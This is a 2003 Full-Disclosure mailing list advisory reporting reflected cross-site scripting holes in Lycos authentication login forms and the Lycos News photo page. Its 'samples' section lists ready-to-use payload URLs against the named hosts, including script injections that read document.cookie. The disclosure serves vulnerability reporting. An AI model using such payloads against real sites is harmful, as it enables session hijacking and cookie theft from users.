[Full-Disclosure] Lycos Authenticating Systems and Lycos News server Vulnerabilities

From: Lorenzo Hernandez Garcia-Hierro (novappc_at_novappc.com)
Date: 06/14/03

  • Next message: Lorenzo Hernandez Garcia-Hierro: "[Full-Disclosure] Ok KF, i tell you about the buffer overflow in Sphera"
    To: <full-disclosure@lists.netsys.com>
    Date: Sat, 14 Jun 2003 16:48:05 +0200
    
    

    ---------------
    Systems affected: Lycos authenticating servers ,Login forms, Lycos News Site
    Risk: 7
    Type of errors: Input Validation Flaw
    ---------------
    I encountered security holes in the Lycos Authentication servers . These
    servers are affected by multiple Cross Site Scripting
    attacks .The hole is in the form that the login cgi program makes the final
    lofin form , injecting a final tag like "> in the m_CBURL
    variable you can inject html and script in the login form. In addition i
    encountered security holes in the Lycos News server related to XSS attacks.
    -------------
    EXPLOITS / PROOFS OF CONCEPT
    -------------
    http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=">[HERE COMES YOUR XSS
    ATTACK CODE]

    http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
    [XSS ATTACK CODE]

    ------------
    SAMPLES
    ------------
    http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
    <H1>xss in Lycos WebSites</h1>
    http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
    <script>alert(document.cookie);</script>
    http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
    <iframe></iframe>
    http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><h1>XSS in Lycos
    Authenticating Servers</h1><a href="
    http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><script>alert(document.
    cookie);</script>

    ------------------------------------------------------
    Lorenzo Hernandez Garcia-Hierro
    --- Computer Security Analyzer ---
    --Nova Projects Professional Coding--
    PGP: Keyfingerprint
    B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
    ID: 0x9C38E1D7
    **********************************
    www.novappc.com
    security.novappc.com
    www.lorenzohgh.com
    ______________________

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Lorenzo Hernandez Garcia-Hierro: "[Full-Disclosure] Ok KF, i tell you about the buffer overflow in Sphera"